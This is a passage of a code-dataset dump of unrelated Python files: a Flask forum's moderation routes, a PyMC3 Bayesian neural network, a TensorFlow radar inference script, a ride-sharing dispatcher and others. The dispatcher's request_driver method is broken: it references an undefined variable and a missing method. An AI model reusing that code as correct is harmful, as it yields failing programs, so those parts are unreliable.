page(html.threadDoesNotExist(),uid)\n\n\n    \n\n\n\n\n\n# CREATE NEW .....\n# add post, n = tid\n@app.route(\"/reply-<int:n>\",methods=['GET','POST'])\ndef reply(n):\n    uid = getUID()\n\n    if uid == -1:\n        return page(html.permissionDenied(),-1)\n    if request.method == \"POST\":\n        tid = int(request.form[\"tid\"])\n        thread = c.threads.Collections.find_one({\"id\":tid})\n        \n        if thread:\n            if (not thread['hid'] and not thread['lock']) or admin(uid):\n                utils.createPost(uid, tid, request.form[\"content\"])\n                return redirect(\"/thread-%d\"%(tid))\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.threadDoesNotExist(),uid)\n    else:\n        r = \"\"\n        \n        thread = c.threads.Collections.find_one({\"id\":int(n)})\n        if thread:\n            if (not thread['hid'] and not thread['lock']) or admin(uid):\n                r += html.reply(thread[\"id\"])\n                return page(r,uid)\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.threadDoesNotExist(),uid)\n\n# new thread, n = tid\n@app.route(\"/newthread-<int:n>\",methods=['GET','POST'])\ndef newthread(n):\n    uid = getUID()\n\n    if uid == -1:\n        return page(html.permissionDenied(),-1)\n\n    if request.method == \"POST\":\n        fid = int(request.form[\"fid\"])\n        forum = c.forums.Collections.find_one({\"id\":fid})\n        \n        if forum:\n            tid = utils.createThread(uid, fid, request.form[\"title\"], request.form[\"desc\"], request.form[\"content\"])\n            return redirect(\"/thread-%d\"%(tid))\n        else:\n            return page(html.forumDoesNotExist(),uid)\n    else:\n        r = \"\"\n        \n        forum = c.forums.Collections.find_one({\"id\":int(n)})\n        if forum:\n            r += html.newthread(forum[\"id\"])\n            return page(r,uid)\n        else:\n            return page(html.forumDoesNotExist(),uid)\n\n@app.route(\"/editpost-<int:n>\",methods=['GET','POST'])\ndef editpost(n):\n    uid = getUID()\n\n    if request.method == \"POST\":\n        pid = int(request.form[\"pid\"])\n        post = c.posts.Collections.find_one({\"id\":pid})\n        \n        if post:\n            if (uid == post[\"uid\"] and not post['hid'] and not getThread(post['tid'])['hid']) or admin(uid):\n                utils.editPost(uid, pid, request.form[\"content\"])\n                return redirect(\"/thread-%d?type=52\"%(getThread(post[\"tid\"])['id']))\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.postDoesNotExist(),uid)\n    else:\n        r = \"\"\n        \n        post = c.posts.Collections.find_one({\"id\":int(n)})\n        if post:\n            if (uid == post[\"uid\"] and not post['hid'] and not getThread(post['tid'])['hid']) or admin(uid):\n                r += html.editpost(post[\"id\"])\n                return page(r,uid)\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.postDoesNotExist(),uid)\n\n@app.route(\"/edittitle-<int:n>\",methods=['GET','POST'])\ndef edittitle(n):\n    uid = getUID()\n\n    if request.method == \"POST\":\n        tid = int(request.form[\"tid\"])\n        thread = c.threads.Collections.find_one({\"id\":tid})\n        \n        if thread:\n            if admin(uid):\n                utils.edittitle(tid, request.form[\"title\"], request.form[\"desc\"])\n                return redirect(\"/thread-%d?type=1\"%(tid))\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.threadDoesNotExist(),uid)\n    else:\n        r = \"\"\n        \n        thread = c.threads.Collections.find_one({\"id\":int(n)})\n        if thread:\n            if admin(uid):\n                r += html.edittitle(thread[\"id\"])\n                return page(r,uid)\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.threadDoesNotExist(),uid)\n\n\n# admin tools\n@app.route(\"/delthread-<int:n>\",methods=['GET','POST'])\ndef delthread(n):\n    uid = getUID()\n\n    if request.method == \"POST\":\n        tid = int(request.form[\"tid\"])\n        thread = c.threads.Collections.find_one({\"id\":tid})\n        \n        if thread:\n            if admin(uid):\n                utils.delthread(tid)\n                if \"ajax\" in request.form:\n                    return \"/forum-%d?type=1\"%(thread['fid'])\n                else:\n                    return redirect(\"/forum-%d?type=1\"%(thread['fid']))\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.threadDoesNotExist(),uid)\n    else:\n        r = \"\"\n        \n        thread = c.threads.Collections.find_one({\"id\":int(n)})\n        if thread:\n            if admin(uid):\n                r += html.delthread(thread[\"id\"])\n                return page(r,uid)\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/delpost-<int:n>\",methods=['GET','POST'])\ndef delpost(n):\n    uid = getUID()\n\n    if request.method == \"POST\":\n        pid = int(request.form[\"pid\"])\n        post = c.posts.Collections.find_one({\"id\":pid})\n        \n        if post:\n            if admin(uid) and getThread(post['tid'])['pid'] != post['id']:\n                utils.delpost(pid)\n                if \"ajax\" in request.form:\n                    return \"/thread-%d?type=4\"%(post['tid'])\n                else:\n                    return redirect(\"/thread-%d?type=51\"%(post['tid']))\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.postDoesNotExist(),uid)\n    else:\n        r = \"\"\n        \n        post = c.posts.Collections.find_one({\"id\":int(n)})\n        if post:\n            if admin(uid) and getThread(post['tid'])['pid'] != post['id']:\n                r += html.delpost(post[\"id\"])\n                return page(r,uid)\n            else:\n                return page(html.permissionDenied(),uid)\n        else:\n            return page(html.postDoesNotExist(),uid)\n    \n@app.route(\"/hidepost-<int:n>\")\ndef hidepost(n):\n    uid = getUID()\n\n    post = c.posts.Collections.find_one({\"id\":int(n)})\n    if post:\n        if admin(uid):\n            utils.hidepost(post['id'])\n            return redirect(\"thread-%d\"%(post['tid']))\n        else:\n            return page(html.permissionDenied(),uid)\n    else:\n        return page(html.postDoesNotExist(),uid)\n\n@app.route(\"/unhidepost-<int:n>\")\ndef unhidepost(n):\n    uid = getUID()\n\n    post = c.posts.Collections.find_one({\"id\":int(n)})\n    if post:\n        if admin(uid):\n            utils.unhidepost(post['id'])\n            return redirect(\"thread-%d\"%(post['tid']))\n        else:\n            return page(html.permissionDenied(),uid)\n    else:\n        return page(html.postDoesNotExist(),uid)\n\n@app.route(\"/hidethread-<int:n>\")\ndef hidethread(n):\n    uid = getUID()\n\n    thread = c.threads.Collections.find_one({\"id\":int(n)})\n    if thread:\n        if admin(uid):\n            utils.hidethread(thread['id'])\n            return redirect(\"thread-%d?type=2\"%(thread['id']))\n        else:\n            return page(html.permissionDenied(),uid)\n    else:\n        return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/unhidethread-<int:n>\")\ndef unhidethread(n):\n    uid = getUID()\n\n    thread = c.threads.Collections.find_one({\"id\":int(n)})\n    if thread:\n        if admin(uid):\n            utils.unhidethread(thread['id'])\n            return redirect(\"thread-%d?type=3\"%(thread['id']))\n        else:\n            return page(html.permissionDenied(),uid)\n    else:\n        return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/lockthread-<int:n>\")\ndef lockthread(n):\n    uid = getUID()\n\n    thread = c.threads.Collections.find_one({\"id\":int(n)})\n    if thread:\n        if admin(uid):\n            utils.lockthread(thread['id'])\n            return redirect(\"thread-%d?type=4\"%(thread['id']))\n        else:\n            return page(html.permissionDenied(),uid)\n    else:\n        return page(html.threadDoesNotExist(),uid)\n\n@app.route(\"/unlockthread-<int:n>\")\ndef unlockthread(n):\n    uid = getUID()\n\n    thread = c.threads.Collections.find_one({\"id\":int(n)})\n    if thread:\n        if admin(uid):\n            utils.unlockthread(thread['id'])\n            return redirect(\"thread-%d?type=5\"%(thread['id']))\n        else:\n            return page(html.permissionDenied(),uid)\n    
else:\n return page(html.threadDoesNotExist(),uid)\n\n \nif __name__ == \"__main__\":\n app.run()\n\n","sub_path":"DebateCircle/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310029872","text":"class Solution:\n def finalPrices(self, prices: List[int]) -> List[int]:\n ans = []\n for i in range(len(prices)) :\n dis = 0\n for j in range(i+1,len(prices)) :\n if prices[i] >= prices[j] :\n dis = prices[j]\n break\n ans.append(prices[i]-dis)\n return ans","sub_path":"1475. Final Prices With a Special Discount in a Shop.py","file_name":"1475. Final Prices With a Special Discount in a Shop.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552788867","text":"# coding=utf8\r\nimport docx\r\nfrom en2cn_translate import lookup\r\nfrom datetime import datetime\r\nfrom argparse import ArgumentParser\r\n# help(docx.document)\r\n\r\nparser=ArgumentParser()\r\nparser.add_argument('file',help='the doc path of which you want to translate')\r\nargs=vars(parser.parse_args())\r\n\r\n\r\n# FILENAME='待查英语单词.docx'\r\nFILENAME=args['file']\r\ndef isword(str1):\r\n '''\r\n 判断是否是英语单词\r\n :param str1:\r\n :return:\r\n '''\r\n if not (all(ord(c) < 128 for c in str1) ):\r\n return False\r\n if type(str1)!=str:\r\n print(str1.__class__)\r\n return False\r\n if '--->' in str1:\r\n return False\r\n if len(str1)>1:\r\n return True\r\n\r\n\r\n return False\r\ndef translate_doc():\r\n try:\r\n doc=docx.Document(FILENAME)\r\n for para in doc.paragraphs:\r\n if isword(para.text.strip()):\r\n para.text=para.text.strip()+'--->'+lookup(para.text.strip())\r\n filename=FILENAME.split('.')[0]+datetime.now().strftime('%Y%y%d%H%M%S')+'.docx'\r\n doc.save(FILENAME)\r\n except PermissionError as e:\r\n print('文件被占用,请先关闭!')\r\nif __name__ == '__main__':\r\n translate_doc()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"doc_read.py","file_name":"doc_read.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"564188810","text":"import sys\n\n\ndef split(filename, interval=1000) -> int:\n \"\"\"\n Splits the [file] into chunks of equal length of [interval] except the last file\n Returns the number of files split into.\n \"\"\"\n with open(filename, 'r') as inp:\n lines = []\n ind = 0\n for x, line in enumerate(inp.readlines()):\n lines.append(line)\n if (x+1) % interval == 0:\n ind += 1\n with open(f\"out{ind}.txt\", 'w+') as out:\n out.writelines(lines)\n lines.clear()\n ind += 1\n with open(f\"out{ind}.txt\", 'w+') as out:\n out.writelines(lines)\n lines.clear()\n\n return ind\n\n\nif __name__ == '__main__':\n # python server\\scripts\\split.py corpora\\out.txt\n\n assert len(sys.argv) == 2\n\n print(\"Number of files\", split(sys.argv[1]))\n","sub_path":"server/scripts/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"408841274","text":"from pygamii.objects import Object\nfrom pygamii.action import Action\nfrom pygamii.audio import Audio\nfrom gifts import get_gift\nimport random\n\n\nclass Enemy(Object):\n is_kill = False\n kill_animation = False\n kill_steps = 5\n explosion_audio = Audio('songs/explosion.ogg')\n\n def __init__(self, *args, **kwargs):\n super(Enemy, self).__init__(*args, **kwargs)\n 
self.gift_class = get_gift()\n if self.gift_class:\n self.color = self.gift_class.color\n\n def kill(self):\n if not self.kill_animation:\n self.scene.score.points += 5\n self.explosion_audio.song.set_volume(0.25)\n self.explosion_audio.play()\n self.kill_animation = True\n self.speed = 10\n\n def is_live(self):\n return not self.is_kill and not self.kill_animation\n\n def move(self):\n if self.kill_animation:\n if self.kill_steps % 2:\n self.color = 'red'\n else:\n self.color = 'white'\n self.kill_steps -= 1\n if self.kill_steps == 0:\n self.is_kill = True\n if self.gift_class:\n gift = self.gift_class()\n gift.x = self.x\n gift.y = self.y\n self.scene.add_object(gift)\n else:\n self.y += 1\n\n def on_colision(self, obj):\n if self.scene.airplane is obj and obj.is_live():\n self.kill()\n obj.kill()\n\n\nclass SimpleAirplaneEnemy(Enemy):\n y = -2\n height = 4\n width = 5\n color = 'yellow'\n speed = 5\n _moving = True\n to_render = '\\n'.join([\n ' ▄▄▄ ',\n ' █ ',\n '█████',\n ' ▀ ',\n ])\n\n def __str__(self):\n return self.to_render\n\n\nclass EnemyGenerator(Action):\n interval = 3\n\n def __init__(self, scene, *args, **kwargs):\n super(EnemyGenerator, self).__init__(scene, *args, **kwargs)\n\n def do(self):\n airplane = SimpleAirplaneEnemy()\n airplane.x = random.randrange(0, self.scene.cols - airplane.width)\n self.scene.add_object(airplane)\n\n def stop(self):\n super(EnemyGenerator, self).stop()\n","sub_path":"examples/flycombat/enemies.py","file_name":"enemies.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38828233","text":"#!/usr/bin/env python3\n\n\"\"\"\nCode from http://twiecki.github.io/blog/2016/06/01/bayesian-deep-learning/\n\"\"\"\nimport pymc3 as pm\nimport theano\nimport theano.tensor as T\nimport numpy as np\nimport seaborn as sns\n\nfrom sklearn.preprocessing import scale\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.datasets import make_moons\n\nimport matplotlib.pyplot as plt\n\n# Generate our dataset\nX, Y = make_moons(noise=0.2, random_state=0, n_samples=1000)\nX = scale(X)\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=.5)\n\n# Build the structure for our NN\nann_input = theano.shared(X_train)\nann_output = theano.shared(Y_train)\n\nn_hidden = 5\n\ninit_1 = np.random.randn(X.shape[1], n_hidden)\ninit_2 = np.random.randn(n_hidden, n_hidden)\ninit_out = np.random.randn(n_hidden)\n\n# Build the generative procedure\nwith pm.Model() as model:\n\n # Each layer in the NN is defined by the set of weights\n # Bayesian because we have priors...\n w_in_1 = pm.Normal('w_in_1', 0, sd=1, shape=(X.shape[1], n_hidden), testval=init_1)\n w_in_2 = pm.Normal('w_in_2', 0, sd=1, shape=(n_hidden, n_hidden), testval=init_2)\n w_out = pm.Normal('w_out', 0, sd=1, shape=(n_hidden,), testval=init_out)\n \n # Defining the activation functions\n act_1 = T.tanh(T.dot(ann_input, w_in_1))\n act_2 = T.tanh(T.dot(act_1, w_in_2))\n act_out = T.nnet.sigmoid(T.dot(act_2, w_out))\n \n # We are doing classification so our likelihood is a Bernoulli\n out = pm.Bernoulli('out', act_out, observed=ann_output)\n\nwith model:\n # Draw samples from our model. 
Here we use ADVI.\n v_params = pm.variational.advi(n=50000)\n trace = pm.variational.sample_vp(v_params, draws=5000)\n \n # Now we make predictions by sampling from the posterior\n ann_input.set_value(X_test)\n ann_output.set_value(Y_test)\n ppc = pm.sample_ppc(trace, model=model, samples=500)\n pred = ppc['out'].mean(axis=0) > 0.5\n \n # The prediction accuracy is generated from the posterior mean\n # of the samples. This should correspond to ML under squared loss.\n print(\"Accuracy = {}%\".format((Y_test == pred).mean() * 100))\n\n# Plotting everything\n# First our predictions\nfig, ax = plt.subplots()\nax.scatter(X_test[pred==0, 0], X_test[pred==0, 1])\nax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')\nsns.despine()\nax.set(title=\"Predicted labels in testing set\", xlabel='X', ylabel='Y')\nplt.show()\n\n# Now the probability surface\ngrid = np.mgrid[-3:3:100j, -3:3:100j]\ngrid_2d = grid.reshape(2, -1).T\ndummy_out = np.ones(grid.shape[1], dtype=np.int8)\n\n# Generate posterior samples over the grid\nann_input.set_value(grid_2d)\nann_output.set_value(dummy_out)\nppc = pm.sample_ppc(trace, model=model, samples=500)\n\ncmap = sns.diverging_palette(250, 12, s=85, l=25, as_cmap=True)\nfig, ax = plt.subplots(figsize=(10,6))\ncontour = ax.contour(*grid, levels = ppc['out'].mean(axis=0).reshape(100,100), cmap=cmap)\nax.scatter(X_test[pred==0,0], X_test[pred==0,1])\nax.scatter(X_test[pred==1,0], X_test[pred==1,1], color='r')\ncbar = plt.colorbar(contour, ax=ax)\n_ = ax.set(xlim=(-3,3), ylim=(-3,3), xlabel='X', ylabel='Y')\ncbar.ax.set_ylabel(\"Posterior predictive mean probability of class label = 0\")\n\nplt.show()\n\n# Uncertainly levels at each point\ncmap = sns.cubehelix_palette(light=1, as_cmap=True)\nfig, ax = plt.subplots(figsize=(10,6))\ncontour = ax.contourf(*grid, levels = ppc['out'].std(axis=0).reshape(100,100), cmap=cmap)\nax.scatter(X_test[pred==0,0], X_test[pred==0,1])\nax.scatter(X_test[pred==1,0], X_test[pred==1,1], color='r')\ncbar = plt.colorbar(contour, ax=ax)\n_ = ax.set(xlim=(-3,3), ylim=(-3,3), xlabel='X', ylabel='Y')\ncbar.ax.set_ylabel(\"Posterior predictive standard deviation\")\n\nplt.show()\n\n\n","sub_path":"NN/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"645166461","text":"from django.urls import path\nfrom .views import TaskList, TaskDetail, TaskCreate, TaskUpdate, TaskDelete, UserLoginView, RegisterUser\nfrom django.contrib.auth.views import LogoutView\nfrom . 
import views\n\nurlpatterns = [\n    path('', views.landing, name = 'landing'),\n    path('login/', UserLoginView.as_view(), name='login'),\n    path('logout/', LogoutView.as_view(next_page='login'), name='logout'),\n    path('register/', RegisterUser.as_view(), name='register'),\n    path('task/', TaskList.as_view(), name = 'tasks'),\n    path('task/<int:pk>/', TaskDetail.as_view(), name = 'task'),\n    path('task-create/', TaskCreate.as_view(), name = 'task-create'),\n    path('task-update/<int:pk>/', TaskUpdate.as_view(), name = 'task-update'),\n    path('task-delete/<int:pk>/', TaskDelete.as_view(), name = 'task-delete'),\n]\n","sub_path":"todo/todoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542990158","text":"from driver import Driver\nfrom rider import Rider\nfrom location import Location\n\n\nclass Dispatcher:\n    \"\"\"A dispatcher fulfills requests from riders and drivers for a\n    ride-sharing service.\n\n    When a rider requests a driver, the dispatcher assigns a driver to the\n    rider. If no driver is available, the rider is placed on a waiting\n    list for the next available driver. A rider that has not yet been\n    picked up by a driver may cancel their request.\n\n    When a driver requests a rider, the dispatcher assigns a rider from\n    the waiting list to the driver. If there is no rider on the waiting list\n    the dispatcher does nothing. Once a driver requests a rider, the driver\n    is registered with the dispatcher, and will be used to fulfill future\n    rider requests.\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"Initialize a Dispatcher.\n\n        @type self: Dispatcher\n        @rtype: None\n        \"\"\"\n        self._a_drivers = []\n        self._w_riders = []\n\n    def __str__(self):\n        \"\"\"Return a string representation of the dispatcher's fleet of drivers.\n\n        @type self: Dispatcher\n        @rtype: str\n\n\n        >>> disp = Dispatcher()\n        >>> d1 = Driver('Amaranth', Location(1,2), 1)\n        >>> d2 = Driver('Johnny', Location(2,3), 1)\n        >>> d3 = Driver('Leia', Location(1,3), 1)\n        >>> disp._a_drivers.append(d1)\n        >>> disp._a_drivers.append(d2)\n        >>> disp._a_drivers.append(d3)\n        >>> print(disp)\n        Amaranth\n        Johnny\n        Leia\n        \"\"\"\n        s = ''\n        for driver in self._a_drivers:\n            s = s + driver.id + '\\n'\n        return s[:-1]\n\n    def request_driver(self, rider):\n        \"\"\"Return a driver for the rider, or None if no driver is available.\n\n        Add the rider to the waiting list if there is no available driver.\n\n        @type self: Dispatcher\n        @type rider: Rider\n        @rtype: Driver | None\n\n\n        
>>> disp = Dispatcher()\n >>> d1 = Driver('Amaranth', Location(1,2), 1)\n >>> r = Rider('Almond', Location(2,4), Location(1,4), 10)\n >>> disp.request_driver(r)\n >>> print(disp.request_rider(d1))\n Almond\n \"\"\"\n if len(self._w_riders) == 0:\n self._a_drivers.append(driver)\n return None\n else:\n return self._w_riders.pop(0)\n\n def cancel_ride(self, rider):\n \"\"\"Cancel the ride for rider.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: None\n \"\"\"\n if rider in self._w_riders:\n self._w_riders.remove(rider)\n","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"170847413","text":"import time\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nimport sys\nimport random\nimport os\nfrom nets import models_factory\nfrom utils import tf_util, preprocess\nfrom metpy.io import Level3File\nfrom skimage.external.tifffile import imsave\n\n\n# -----------------------------------------------------------------------------\nFLAGS = tf.app.flags.FLAGS\n\n# data I/O\ntf.app.flags.DEFINE_string('input_images_path', '',\n 'path of input sequence, seperated with comma')\ntf.app.flags.DEFINE_string('save_name', '',\n 'path and file name to save the result')\n\n# model\ntf.app.flags.DEFINE_string('model_name', 'predrnn_pp_inference',\n 'The name of the architecture.')\ntf.app.flags.DEFINE_string('pretrained_model', 'dat/model.ckpt-10000',\n 'file of a pretrained model to initialize from.')\ntf.app.flags.DEFINE_integer('input_length', 1, '')\ntf.app.flags.DEFINE_integer('pred_length', 11,\n 'total input and output length.')\ntf.app.flags.DEFINE_integer('img_width', 64,\n 'input image width.')\ntf.app.flags.DEFINE_integer('img_channel', 1,\n 'number of image channel.')\ntf.app.flags.DEFINE_integer('stride', 1,\n 'stride of a convlstm layer.')\ntf.app.flags.DEFINE_integer('filter_size', 5,\n 'filter of a convlstm layer.')\ntf.app.flags.DEFINE_string('num_hidden', '128,64,64,64',\n 'COMMA separated number of units in a convlstm layer.')\ntf.app.flags.DEFINE_integer('patch_size', 4,\n 'patch size on one dimension.')\ntf.app.flags.DEFINE_boolean('layer_norm', True,\n 'whether to apply tensor layer norm.')\n# inference\ntf.app.flags.DEFINE_integer('batch_size', 1,\n 'batch size for inference.')\n\n\nclass Model(object):\n def __init__(self):\n self.gpus = tf_util.available_gpus()\n self.num_gpus = len(self.gpus)\n if self.num_gpus:\n assert FLAGS.batch_size % self.num_gpus == 0, \"Batch size should be an integral multiple of number of GPUs\"\n # inputs\n self.x = tf.placeholder(tf.float32,\n [FLAGS.batch_size,\n FLAGS.input_length,\n FLAGS.img_width // FLAGS.patch_size,\n FLAGS.img_width // FLAGS.patch_size,\n FLAGS.patch_size * FLAGS.patch_size * FLAGS.img_channel])\n\n x_splits = tf.split(self.x, max(self.num_gpus, 1))\n\n num_hidden = [int(x) for x in FLAGS.num_hidden.split(',')]\n num_layers = len(num_hidden)\n\n pred_seq = []\n devices = self.gpus or ['/cpu:0']\n with tf.variable_scope(tf.get_variable_scope()) as outer_scope:\n for i, d in enumerate(devices):\n with tf.device(d), tf.name_scope('tower_%d' % i):\n pred_ims = models_factory.construct_model(\n FLAGS.model_name, x_splits[i], None,\n num_layers, num_hidden,\n FLAGS.filter_size, FLAGS.stride,\n FLAGS.pred_length, FLAGS.input_length,\n FLAGS.layer_norm)\n pred_seq.append(pred_ims)\n outer_scope.reuse_variables()\n\n with tf.name_scope(\"apply_gradients\"), 
tf.device(devices[0]):\n self.pred_seq = tf.concat(pred_seq, 0)\n\n # session\n variables = tf.global_variables()\n variables = list(filter(lambda v: 'states_layer' not in v.name and 'states_global' not in v.name, variables))\n self.saver = tf.train.Saver(variables)\n init = tf.global_variables_initializer()\n configProt = tf.ConfigProto()\n configProt.gpu_options.allow_growth = True\n configProt.allow_soft_placement = True\n self.sess = tf.Session(config=configProt)\n self.sess.run(init)\n if FLAGS.pretrained_model:\n self.saver.restore(self.sess, FLAGS.pretrained_model)\n\n def inference(self, inputs):\n feed_dict = {self.x: inputs}\n gen_ims = self.sess.run(self.pred_seq, feed_dict)\n return gen_ims\n\n\ndef main(argv=None):\n\n model = Model()\n\n while True:\n line = input()\n try:\n inf, outf = line.split(',')\n img = np.array(Level3File(inf).sym_block[0][0]['data'], dtype='float32')\n h, w = img.shape\n nw = FLAGS.img_width\n nh = h * nw // w\n img = cv2.resize(img, (nh, nw), interpolation=cv2.INTER_AREA)\n img = img[np.newaxis, np.newaxis, :, :, np.newaxis]\n img = preprocess.reshape_patch(img, FLAGS.patch_size)\n\n pred = model.inference(img)\n pred = preprocess.reshape_patch_back(pred[:, np.newaxis, :], FLAGS.patch_size)\n pred = cv2.resize(pred[0, 0, :, :, 0], (h, w), interpolation=cv2.INTER_CUBIC)\n\n imsave(outf, pred, metadata={'axis': 'YX'})\n print('done')\n\n except Exception as e:\n print('failed:', e)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"473400066","text":"import datetime\nimport helpers.helper_api as helper_api\nimport helpers.helper_config as helper_config\nimport helpers.helper_file as helper_file\nimport json\nimport sys\nimport time\n\nfrom helpers.helper_core import Helper\n\nhelper_core = Helper()\n\nstart_time_seconds = int(round(time.time()))\n\nengagement_check_results_file=sys.argv[1]\nif engagement_check_results_file == '':\n print(\"ERROR PROVIDE A FILE FOR STORING RESULTS\")\n sys.exit()\n#NOTIFICATION LOGIC\nhelper_core.log(start_time_seconds, \"INFO\", \"Notifying users according to results in {}\".format(engagement_check_results_file))\n\nteams_notification_endpoint = helper_config.get_config_item('TEAMS', 'TEAMS_NOTIFICATION_API')\nteams_channel_email_address = helper_config.get_config_item('TEAMS', 'TEAMS_CHANNEL_EMAIL')\nadmin_email_address = helper_config.get_config_item('ADMIN', 'ADMIN_EMAIL')\nmessage_subject_template = helper_config.get_config_item('TEAMS', 'TEAMS_MESSAGE_SUBJECT_TEMPLATE')\n\nengagement_crm_link_template = helper_config.get_config_item('CRM_DATA_MODEL_FIELDS', 'CRM_ENGAGEMENT_LINK_TEMPLATE')\n\n#The order of engagement_name second and msp_engagementid last must be kept\nengagement_keys_of_interest = [\n 'engagement_owner',\n 'engagement_name',\n 'engagement_status',\n 'engagement_sponsor',\n 'engagement_partner',\n 'engagement_start_date',\n 'msp_engagementid'\n]\n\nmessage_subject = message_subject_template.format( datetime.date.today())\nmessage_to = [ teams_channel_email_address, admin_email_address ]\n\nmessage_body = '
'\nhelper_core.log(start_time_seconds, \"INFO\", \"Reading stored in {}\".format(engagement_check_results_file))\nwith open(engagement_check_results_file) as fp:\n results_data = json.load(fp)\n if len(results_data) > 0:\n helper_core.log(start_time_seconds, \"INFO\", \"Items to correct: {}\".format(len(results_data)))\n for result in results_data:\n if len(result['affected_items']) > 0:\n #AFFECTED CHECK INFO\n check_title = \"
Check {:02d}: {} - {}
\".format(result['check_id'], result['check_type'], result['check_description'])\n \n #SELECT FIELDS OF INTEREST IN AFFECTED ENGAGEMENTS\n result_affected_items_all_data = result['affected_items']\n result_affected_items_filtered_data = [ { dict_key_of_interest: result_affected_item_all_data[dict_key_of_interest] for dict_key_of_interest in engagement_keys_of_interest } for result_affected_item_all_data in result_affected_items_all_data ]\n\n check_table = ''\n #Remove redundant info in field name\n engagement_keys_of_interest_filtered = [ one_key.replace(\"engagement_\", \"\").upper() for one_key in engagement_keys_of_interest ]\n #Remove the last field\n engagement_keys_of_interest_filtered.pop()\n check_table_header = ''\n\n check_table_rows = []\n for filtered_engagement in result_affected_items_filtered_data:\n filtered_engagement_values = [ str(filtered_engagement[key_of_interest]) for key_of_interest in engagement_keys_of_interest ]\n\n #The last value 'msp_engagementid' is just for creating a link\n msp_engagementid = filtered_engagement_values.pop()\n engagement_crm_link = engagement_crm_link_template.format(msp_engagementid)\n \n filtered_engagement_values[1] = '{}'.format(engagement_crm_link, filtered_engagement_values[1])\n\n check_table_row = ''\n check_table_rows.append(check_table_row)\n\n check_table += check_table_header\n for check_table_row in check_table_rows:\n check_table += check_table_row\n \n check_table += '
' + ''.join(engagement_keys_of_interest_filtered) + '
' + ''.join(filtered_engagement_values) + '

'\n\n message_body += check_title\n message_body += check_table\n \n #Take emails from owners\n engagement_owner_names = set()\n for result in results_data:\n [engagement_owner_names.add(affected_item['engagement_owner']) for affected_item in result['affected_items']]\n \n engagement_owner_emails = helper_core.get_owner_emails(engagement_owner_names)\n\n [message_to.append(email) for email in engagement_owner_emails]\n \n else:\n helper_core.log(start_time_seconds, \"INFO\", \"No items to correct\")\n message_body = '
No affected items today
' \r\n\r\n#CLOSE HTML AND INSERT STYLE\r\nmessage_body += ''\r\nmessage_body = message_body.replace('', '')\r\nmessage_body = message_body.replace('
', '')\nmessage_body = message_body.replace('', '')\n\n#CONSTRUCT MESSAGE\nmessage = {'message_subject': message_subject, 'message_body': message_body, 'message_to': message_to}\n\n#SENT IT\nhelper_core.log(start_time_seconds, \"INFO\", \"Sending notification\")\nhelper_api.post_to_api(teams_notification_endpoint, message)","sub_path":"3_crm_engagement_notifications.py","file_name":"3_crm_engagement_notifications.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453104705","text":"import pandas as pd\nfrom typing import Dict, Any\n\n\n# 十档Vwap计算公式\ndef depthVwap_worker(data: pd.DataFrame,\n code: str,\n date: str,\n *args,\n **kwargs) -> Dict[str, Any]:\n data['time'] = data['时间'].apply(lambda x: x[-8:])\n l = data['time'] >= '09:25:00'\n data = data[l].copy()\n\n res = {'date': date, 'code': code}\n\n l = data['最新价'] != 0\n res['open'] = data.loc[l, '最新价'].iloc[0]\n res['close'] = data.loc[l, '最新价'].iloc[-1]\n res['low'] = data.loc[l, '最新价'].min()\n res['high'] = data.loc[l, '最新价'].max()\n res['volume'] = data['总量'].iloc[-1]\n res['amount'] = data['总金额'].iloc[-1]\n\n data['amountdiff'] = data['总金额'] - data['总金额'].shift(1)\n data['bid'], data['ask'] = 0, 0\n for i in range(1, 11):\n data['bid'] = data['bid'] + data['挂买价' + str(i)] * data['挂买量' + str(i)] * (1.1 - 0.1 * i)\n data['ask'] = data['bid'] + data['挂卖价' + str(i)] * data['挂卖量' + str(i)] * (1.1 - 0.1 * i)\n data['spread'] = (data['bid'] - data['ask']) / (data['bid'] + 